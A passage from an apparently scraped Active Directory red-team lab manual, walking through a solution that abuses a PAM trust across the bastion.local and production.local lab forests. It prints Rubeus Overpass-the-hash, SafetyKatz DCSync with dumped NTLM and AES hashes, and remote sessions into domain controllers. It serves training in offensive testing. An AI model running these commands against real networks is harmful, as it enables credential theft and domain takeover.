useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/8/2021 6:18:45 AM
primarygroupid : 513
pwdlastset : 1/7/2021 10:18:45 PM
usnchanged : 41130
[snip]

This means, we can escalate privileges in db.local by using credentials of dbxsvc. We can use winrs or
PowerShell Remoting cmdlets.

Using winrs on the reverse shell:

PS C:\Windows\system32> winrs -r:db-dc.db.local -u:dbvendor\dbxsvc -

p:Password@123 "whoami"
dbvendor\db23svc

Using PowerShell Remoting on the reverse shell:

PS C:\Windows\system32> $passwd = ConvertTo-SecureString 'Password@123' -

AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object
System.Management.Automation.PSCredential ("dbvendor\dbxsvc", $passwd)
PS C:\Windows\system32> $dbdc = New-PSSession -Computername db-dc.db.local -
Credential $creds
PS C:\Windows\system32> Invoke-Command -scriptblock{whoami;hostname} -Session
$dbdc
dbvendor\dbxsvc
DB-DC

Hands-On 28:
Task
• Compromise production.local by abusing PAM trust between bastion.local and production.local

Solution
First, we need to compromise bastion.local. We have DA on techcorp.local that has a two-way trust with
bastion.local.

Let's enumerate Foreign Security Principals on bastion.local to check if there is anything interesting.
Using the Active Directory module from InvisiShell:

PS C:\AD\Tools> Get-ADObject -Filter {objectClass -eq

"foreignSecurityPrincipal"} -Server bastion.local

DistinguishedName
Name ObjectClass
-----------------
---- -----------
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=bastion,DC=local
S-1-5-4 foreignSecurityPrinc...
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=bastion,DC=local
S-1-5-11 foreignSecurityPrinc...
CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=bastion,DC=local
S-1-5-17 foreignSecurityPrinc...
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=bastion,DC=local
S-1-5-9 foreignSecurityPrinc...
CN=S-1-5-21-2781415573-3701854478-2406986946-
500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local S-1-5-21-2781415573-
3701854478-2406986946-500 foreignSecurityPrinc...

So, the DA of techcorp.local is a part of a group on bastion.local. To find out which group it is a member
of, run the below command:

PS C:\AD\Tools> Get-ADGroup -Filter * -Properties Member -Server

bastion.local | ?{$_.Member -match 'S-1-5-21-2781415573-3701854478-
2406986946-500'}

DistinguishedName : CN=Administrators,CN=Builtin,DC=bastion,DC=local
GroupCategory : Security
GroupScope : DomainLocal
Member : {CN=S-1-5-21-2781415573-3701854478-2406986946-
500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local, CN=Domain
Admins,CN=Users,DC=bastion,DC=local,
CN=Enterprise Admins,CN=Users,DC=bastion,DC=local,
CN=Administrator,CN=Users,DC=bastion,DC=local}
Name : Administrators

ObjectClass : group
ObjectGUID : 788f92b1-3806-4eef-bcaa-dd8111f45aa5
SamAccountName : Administrators
SID : S-1-5-32-544

Sweet! The administrator of techcorp.local is a member of the built-in administrators group on

bastion.local. That makes things simple!

Let's access bastion-dc as administrator. Run the below command from an elevated shell on the student
VM to use Overpass-the-hash:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:techcorp.local

/user:administrator
/aes256:58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883
/dc:techcorp-dc.techcorp.local /createnetonly:C:\Windows\System32\cmd.exe
/show /ptt
[snip]

In the new process that spawns up, run the below commands to download and use InvisiShell:

C:\Windows\system32> echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll

\\bastion-dc.bastion.local\C$\Users\Public\InShellProf.dll /Y
[snip]
C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\bastion-
dc.bastion.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:bastion-dc.bastion.local cmd
C:\Users\Administrator.TECHCORP>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

Check if PAM trust is enabled. First enumerate trusts on bastion.local. Because we are already on a
domain controller, we can use the Active Directory module:

PS C:\Users\Administrator.TECHCORP> Get-ADTrust -Filter {(ForestTransitive -

eq $True) -and (SIDFilteringQuarantined -eq $False)}

PSComputerName : bastion-dc.bastion.local
RunspaceId : 7fb698b7-72a7-4458-bd5c-1aa1326e399e
Direction : Outbound
DisallowTransivity : False
DistinguishedName : CN=techcorp.local,CN=System,DC=bastion,DC=local
[snip]

PSComputerName : bastion-dc.bastion.local
RunspaceId : 7fb698b7-72a7-4458-bd5c-1aa1326e399e
Direction : Inbound

DisallowTransivity : False
DistinguishedName : CN=production.local,CN=System,DC=bastion,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : production.local
ObjectClass : trustedDomain
ObjectGUID : 3e0958ef-54c4-4afe-b4df-672150c1dbfc
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=bastion,DC=local
Target : production.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
PS C:\Users\Administrator.TECHCORP> exit
exit
[snip]
C:\Users\Administrator.TECHCORP> exit
exit

Once we know that there is a ForestTransitive trust and SIDFIlteringForestAware is false, enumerate
trusts on production.local to be sure of PAM trust in use. If we try to access production.local from the
session on bastion.local we will face the double hop issue, so we need to use Overpass-the-hash
Administrator of bastion.local.

First, we will use the privileges of domain administrator of techcorp.local to extract credentials of
domain administrator for bastion.local. Use the below command in the command prompt that we used
above:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync
/user:bastion\Administrator /domain:bastion.local" "exit"

[snip]

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator

Account Type : 30000000 ( USER_OBJECT )

User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/12/2019 9:49:56 PM
Object Security ID : S-1-5-21-284138346-1733301406-1958478260-500
Object Relative ID : 500

Credentials:
Hash NTLM: f29207796c9e6829aa1882b7cccfa36d

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 31b615437127e4a4badbea412c32e37f

* Primary:Kerberos-Newer-Keys *
Default Salt : BASTION-DCAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) :
a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292
aes128_hmac (4096) : e8679f4d4ed30fe9d2aeabb8b5e5398e
[snip]

Run the below command from an elevated shell on the student VM to use Overpass-the-hash and start a
process with the privileges of domain administrator of bastion.local:

C:\Windows\system32> C:\AD\Tools\Rubeus.exe asktgt /domain:bastion.local

/user:administrator
/aes256:a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292
/dc:bastion-dc.bastion.local /createnetonly:C:\Windows\System32\cmd.exe /show
/ptt
[snip]

In the new process, use the below commands to copy and use InvisiShell:

C:\Windows\system32> echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll

\\bastion-dc.bastion.local\C$\Users\Public\InShellProf.dll /Y
[snip]
C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\bastion-
dc.bastion.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:bastion-dc.bastion.local cmd
C:\Users\Administrator>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

We are now ready to enumerate production.local. Run the below commands on bastion-dc:

PS C:\Users\Administrator> Get-ADTrust -Filter {(ForestTransitive -eq $True)

-and (SIDFilteringQuarantined -eq $False)} -Server production.local

Direction : Outbound
DisallowTransivity : False
DistinguishedName : CN=bastion.local,CN=System,DC=production,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : bastion.local
ObjectClass : trustedDomain
ObjectGUID : f6ebbca6-749d-4ee6-bb6d-d3bbb178fd02
SelectiveAuthentication : False
SIDFilteringForestAware : True
SIDFilteringQuarantined : False
Source : DC=production,DC=local
Target : bastion.local
TGTDelegation : False
TrustAttributes : 1096
[snip]

So we now know that SID History is allowed for access from bastion.local to production.local.

Check the membership of Shadow Security Principals on bastion.local:

PS C:\Users\Administrator> Get-ADObject -SearchBase ("CN=Shadow Principal

Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -
Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

Name : Shadow Principal Configuration

member : {}
msDS-ShadowPrincipalSid :

Name : prodforest-ShadowEnterpriseAdmin
member : {CN=Administrator,CN=Users,DC=bastion,DC=local}
msDS-ShadowPrincipalSid : S-1-5-21-1765907967-2493560013-34545785-519

So, the Administrator of bastion.local is a member of the Shadow Security Principals which is mapped to
the Enterprise Admins group of production.local. That is, the Administrator of bastion.local has
Enterprise Admin privileges on production.local.

Now, we can access the production.local DC as domain administrator of bastion.local from our current
domain us.techcorp.local. Note that production.local has no DNS entry or trust with our current domain
us.techcorp.local and we need to use IP address of DC of production.local to access it.

Run the below command on the bastion-dc to get IP of production.local DC:

PS C:\Users\Administrator> Get-DnsServerZone -ZoneName production.local |fl *

Get-DnsServerZone -ZoneName production.local |fl *

MasterServers : 192.168.102.1
DistinguishedName :
DC=production.local,cn=MicrosoftDNS,DC=ForestDnsZones,DC=bastion,DC=local
[snip]

To use PowerShell Remoting to connect to an IP address, we must modify the WSMan Trustedhosts
property on the student VM. Run the below command in an elevated PowerShell on the student VM:

PS C:\Windows\system32> Set-Item WSMan:\localhost\Client\TrustedHosts * -

Force

Additionally, to connect to an IP address we have to use NTLM authentication. Therefore, we need to

run OverPass-The-Hash with NTLM hash and not AES keys of the domain administrator of bastion.local:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:administrator /domain:bastion.local
/ntlm:f29207796c9e6829aa1882b7cccfa36d /run:powershell.exe" "exit"
[snip]

In the new PowerShell session:

PS C:\Windows\system32> Enter-PSSession 192.168.102.1 -Authentication

NegotiateWithImplicitCredential
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents> whoami
bastion\administrator
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents> hostname
Production-DC
[192.168.102.1]: PS C:\Users\Administrator.BASTION\Documents>

Create Your Azure Free Account Today - Microsoft Azure
No ratings yet
Create Your Azure Free Account Today - Microsoft Azure
12 pages
LabManual Sliver
No ratings yet
LabManual Sliver
232 pages
438-Acute HTB Official Writeup Tamarisk
No ratings yet
438-Acute HTB Official Writeup Tamarisk
19 pages
LabManualV1 5
No ratings yet
LabManualV1 5
123 pages
Lab Manual
No ratings yet
Lab Manual
157 pages
Active Directory Enumeration & Attacks
No ratings yet
Active Directory Enumeration & Attacks
368 pages
CRTP-full Exam Report
86% (7)
CRTP-full Exam Report
23 pages
LabManualV1 5
No ratings yet
LabManualV1 5
121 pages
Linux Vs Windows XP: Matthew Faulkner Edd Hannay Rob Hooper
No ratings yet
Linux Vs Windows XP: Matthew Faulkner Edd Hannay Rob Hooper
22 pages
Understanding Services and Applications by Type: Defining Infrastructure As A Service (Iaas)
No ratings yet
Understanding Services and Applications by Type: Defining Infrastructure As A Service (Iaas)
8 pages
AD Advanced Notes
No ratings yet
AD Advanced Notes
405 pages
NVIDIA BlueField-2 Ethernet DPU User Guide - 09!20!2022
No ratings yet
NVIDIA BlueField-2 Ethernet DPU User Guide - 09!20!2022
74 pages
LabManual Sliver
No ratings yet
LabManual Sliver
224 pages
Lab Manual
No ratings yet
Lab Manual
158 pages
CN GWM Delphi en
No ratings yet
CN GWM Delphi en
1 page
Active Directory Attacks Cheat Sheet
100% (1)
Active Directory Attacks Cheat Sheet
102 pages
Attacking and Defending Active Directory-Lab Manual
No ratings yet
Attacking and Defending Active Directory-Lab Manual
122 pages
Lab - 03 Windows Privilege Escalation
No ratings yet
Lab - 03 Windows Privilege Escalation
18 pages
Pravin Mishra - Cloud Computing With AWS - Everything You Need To Know To Be An AWS Cloud Practitioner-Apress
100% (2)
Pravin Mishra - Cloud Computing With AWS - Everything You Need To Know To Be An AWS Cloud Practitioner-Apress
340 pages
HTB Walkthrough
No ratings yet
HTB Walkthrough
644 pages
How To Secure Active Directory
100% (1)
How To Secure Active Directory
33 pages
CCS335-CC QB Answer
No ratings yet
CCS335-CC QB Answer
60 pages
CRTP
No ratings yet
CRTP
30 pages
FortiManager Best Practices Guide
No ratings yet
FortiManager Best Practices Guide
33 pages
Tenda N3 User Guide
No ratings yet
Tenda N3 User Guide
78 pages
XXMI Launcher Log
No ratings yet
XXMI Launcher Log
19 pages
Active Directory Exploitation Cheat Sheet by S1Ckb0Y1337
100% (1)
Active Directory Exploitation Cheat Sheet by S1Ckb0Y1337
28 pages
Enabling Windows Active Directory and User Access Controls
No ratings yet
Enabling Windows Active Directory and User Access Controls
56 pages
NCA Student Lab Guide
No ratings yet
NCA Student Lab Guide
21 pages
TP 04 SSE Windows
No ratings yet
TP 04 SSE Windows
14 pages
Topic 1
No ratings yet
Topic 1
34 pages
Microsoft Office Sharepoint Server 2007 Integration Guide
No ratings yet
Microsoft Office Sharepoint Server 2007 Integration Guide
49 pages
LabManualV1 5
No ratings yet
LabManualV1 5
121 pages
Operating System
No ratings yet
Operating System
12 pages
SAML Authentication in Remote Access VPN Clients
No ratings yet
SAML Authentication in Remote Access VPN Clients
7 pages
Task 2
No ratings yet
Task 2
6 pages
Unit 4 Lab Instructions: Administering Active Directory With Powershell
No ratings yet
Unit 4 Lab Instructions: Administering Active Directory With Powershell
10 pages
NEWSL401 Set Up LAN PDF
No ratings yet
NEWSL401 Set Up LAN PDF
254 pages
Enterprise Security Controls Attack Specialist CESC As
No ratings yet
Enterprise Security Controls Attack Specialist CESC As
15 pages
LabManualV1 5
No ratings yet
LabManualV1 5
133 pages
Leica BLK360 G1 - How To Update The Firmware v2.1
No ratings yet
Leica BLK360 G1 - How To Update The Firmware v2.1
4 pages
Practical AD Attacks and Protection Booklet
0% (1)
Practical AD Attacks and Protection Booklet
68 pages
Functional Diagram For The 40-738/42-738 USB 2.0 Hub: Pickering
No ratings yet
Functional Diagram For The 40-738/42-738 USB 2.0 Hub: Pickering
5 pages
Active Directory Lab For Penetration Testing PDF
No ratings yet
Active Directory Lab For Penetration Testing PDF
84 pages
LabManualV1 5
No ratings yet
LabManualV1 5
133 pages
CA-Assignment 2 - Final
No ratings yet
CA-Assignment 2 - Final
2 pages
Apache VS16 Binaries and Modules Download
No ratings yet
Apache VS16 Binaries and Modules Download
2 pages
Window & Active Directory Exploitation Cheat Sheet
No ratings yet
Window & Active Directory Exploitation Cheat Sheet
42 pages
Lab 12
No ratings yet
Lab 12
12 pages
Game of Pwn&Patch
No ratings yet
Game of Pwn&Patch
32 pages
Lab 8
No ratings yet
Lab 8
23 pages
SCTS 242: Network Intrusion Detection and Penetration Testing
No ratings yet
SCTS 242: Network Intrusion Detection and Penetration Testing
21 pages
Report 1
No ratings yet
Report 1
28 pages
Attacking AD With Linux
No ratings yet
Attacking AD With Linux
81 pages
Lab 4
No ratings yet
Lab 4
15 pages
SPOILER AD Workshop
No ratings yet
SPOILER AD Workshop
65 pages
Objectives
No ratings yet
Objectives
9 pages
Enumerating Active Directory
No ratings yet
Enumerating Active Directory
23 pages
Opentext Core Archive For Sap Solutions
0% (1)
Opentext Core Archive For Sap Solutions
4 pages
Hands-On Lab 1-2024b
No ratings yet
Hands-On Lab 1-2024b
8 pages
Cisco ASA Site-To-site VPN With MX Series
No ratings yet
Cisco ASA Site-To-site VPN With MX Series
7 pages
BASIC For PIC Microcontrollers
No ratings yet
BASIC For PIC Microcontrollers
163 pages
Windows & Active Directory Exploitation Cheat Sheet and Command Reference
No ratings yet
Windows & Active Directory Exploitation Cheat Sheet and Command Reference
31 pages
Gian TLVS
No ratings yet
Gian TLVS
2 pages
Atomic Red Team
No ratings yet
Atomic Red Team
6 pages
Open Protocol: Appendix For Powerfocus 6000
No ratings yet
Open Protocol: Appendix For Powerfocus 6000
24 pages
A. Troubleshooting Logon Privileges Scenario: Disclaimer
No ratings yet
A. Troubleshooting Logon Privileges Scenario: Disclaimer
15 pages
Allen Bradley
100% (1)
Allen Bradley
67 pages
Active Directory Penetration Testing Training Online 1679836929
No ratings yet
Active Directory Penetration Testing Training Online 1679836929
10 pages
@FsKnockouT-1. Active Directory Enumeration & Attacks
No ratings yet
@FsKnockouT-1. Active Directory Enumeration & Attacks
368 pages
LabManual Sliver
No ratings yet
LabManual Sliver
214 pages
Windows & Active Directory Exploitation
No ratings yet
Windows & Active Directory Exploitation
30 pages
Active Directory Lab Setup Tool
No ratings yet
Active Directory Lab Setup Tool
15 pages
AD Pentesting Notes
No ratings yet
AD Pentesting Notes
9 pages
Outdated
No ratings yet
Outdated
16 pages
PrimeFaces Showcase Phtcam1
No ratings yet
PrimeFaces Showcase Phtcam1
1 page
P14 - Maintaining Access N Covering Tracks v7
No ratings yet
P14 - Maintaining Access N Covering Tracks v7
5 pages
Chips Located in Cartridges
No ratings yet
Chips Located in Cartridges
13 pages
PENTEST Sur AD
No ratings yet
PENTEST Sur AD
2 pages
ITG, GSD & FCG Turnover
No ratings yet
ITG, GSD & FCG Turnover
2 pages
AD and Windows Exploitation Cheat Sheet
No ratings yet
AD and Windows Exploitation Cheat Sheet
31 pages
© 2020 Caendra Inc. - Hera For PTX - Red-Teaming Active Directory Lab #2 (Els - Bank)
No ratings yet
© 2020 Caendra Inc. - Hera For PTX - Red-Teaming Active Directory Lab #2 (Els - Bank)
49 pages
Hackthebox: Driver Machine Walkthrough: Produced by
No ratings yet
Hackthebox: Driver Machine Walkthrough: Produced by
11 pages
Active Directory Exploitation Cheat Sheet: Share
100% (1)
Active Directory Exploitation Cheat Sheet: Share
14 pages